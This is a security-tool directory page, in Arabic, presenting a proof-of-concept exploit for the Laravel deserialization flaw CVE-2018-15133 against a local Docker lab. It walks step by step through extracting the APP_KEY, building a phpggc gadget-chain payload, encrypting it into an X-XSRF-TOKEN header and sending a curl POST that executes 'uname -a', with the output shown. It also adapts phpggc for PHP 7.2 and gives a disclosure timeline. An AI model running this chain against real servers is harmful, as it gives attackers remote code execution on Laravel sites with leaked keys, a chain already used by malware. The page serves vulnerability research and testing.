Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
laravel-poc-CVE-2018-15133 — إثبات المفهوم لـ CVE-2018-15133 (ثغرة إلغاء التسلسل في Laravel) | Kitploit
أدوات/GitHubGitHub/kozmic/laravel-poc-cve-2018-15133
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubkozmic/laravel-poc-cve-2018-15133

laravel-poc-CVE-2018-15133

إثبات المفهوم لـ CVE-2018-15133 (ثغرة إلغاء التسلسل في Laravel)

عرض المستودع
25836منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لتنفيذ الأوامر عن بُعد في Laravel عند تسرب مفتاح APP_KEY (CVE-2018-15133)

يحتوي هذا المستودع على تطبيق Laravel 5.6.29 بسيط على PHP 7.2.10 مع مسار noop أساسي واحد مضاف في routes/web.php (انظر Dockerfile) وإثبات مفهوم للاستغلال (cve-2018-15133.php) لـ CVE-2018-15133 والذي يجب أن يستغل تطبيق Laravel بنجاح وينفذ الأمر uname -a على النظام المستهدف.

تعليمات حول كيفية تشغيل التطبيق وتنفيذ uname -a على النظام المستهدف

root@kitploit:~
# بناء صورة Docker (أو تخطي هذه الخطوة وجلب من kozmico/laravel-poc-cve-2018-15133):
docker build -t laravel-poc-cve-2018-15133 .
# تشغيل الحاوية وعرضها على localhost:8000:
docker run -d -p 8000:8000 laravel-poc-cve-2018-15133
# يجب أن يعمل Laravel 5.6.29 خام على PHP 7.2.10 الآن على http://localhost:8000

لتنفيذ uname -a على التطبيق التجريبي الذي يشغل Laravel 5.6.29 نقوم بما يلي:

  • استرجاع APP_KEY من تطبيق Laravel الجاري
  • إنشاء حمولة إلغاء التسلسل (unserialize) التي ستنفذ system("uname -a");
  • تشفير حمولة إلغاء التسلسل باستخدام APP_KEY
  • إرسال الحمولة المشفرة في رأس طلب POST، ورؤية أن الكود تم تنفيذه. النجاح!

مثال على الاستغلال الذي ينفذ uname -a

root@kitploit:~
# الحصول على APP_KEY:
$ docker exec -it $(docker ps --latest --quiet) grep -e \^APP_KEY /var/www/html/laravel/.env
APP_KEY=base64:9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk=

# إنشاء حمولة إلغاء التسلسل:
$ phpggc Laravel/RCE1 'uname -a' -b # ملاحظة: phpggc الخام سيعمل فقط على PHP 5.6، هذه نسخة معدلة
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

# تشفير الحمولة باستخدام APP_KEY:
$ ./cve-2018-15133.php 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

'PoC لثغرة إلغاء التسلسل في Laravel <= 5.6.29 (CVE-2018-15133) بواسطة @kozmic

رأس HTTP لطلب POST: 
X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9

# إرسال حمولة الاستغلال ورؤية أنه تم تنفيذ 'uname  -a' حيث يمكننا رؤية 'Linux ad66c19a7ab5 4.15.0-33-generic #36-Ubuntu SMP Wed Aug 15 16:00:05 UTC 2018 x86_64 GNU/Linux' في السطر الأول من الاستجابة:
$ curl localhost:8000 -X POST -H 'X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9'| head -n 2

Linux ad66c19a7ab5 4.15.0-33-generic #36-Ubuntu SMP Wed Aug 15 16:00:05 UTC 2018 x86_64 GNU/Linux
<!DOCTYPE html>
<html lang="en">

تعديل phpggc لـ PHP 7.2: sed -i -e 's/assert/system/g' gadgetchains/Laravel/RCE/1/gadgets.php

الجدول الزمني

  • 2018-08-07: تم الإبلاغ عن الثغرة بواسطة @kozmic إلى جهة الاتصال الأمنية في Laravel وتم تعيين CVE-2018-15133 من قبل Mitre
  • 2018-08-07: أول رد من جهة الاتصال الأمنية بعد 7 دقائق (مثير للإعجاب!)
  • 2018-08-07: تم مشاركة توضيحات وتفاصيل إضافية حول الثغرة
  • 2018-08-08: تم إصدار Laravel 5.6.30 و Laravel 5.5.42 اللذين يصححان الثغرة
  • 2018-09-26: تم نشر إثبات المفهوم بواسطة @kozmic على https://github.com/kozmic/laravel-poc-CVE-2018-15133/
  • 2024-01-16: تمت إضافة CVE-2018-15133 إلى كتالوج الثغرات المستغلة المعروفة (KEV) التابع لـ CISA. نشرت CISA استشارة أمنية سيبرانية باسم مؤشرات الاختراق المعروفة المرتبطة ببرنامج Androxgh0st الضار والتي توثق أن Androxgh0st يستخدم CVE-2018-15133 كجزء من مجموعة أدواته الضارة.
تنزيل الأداة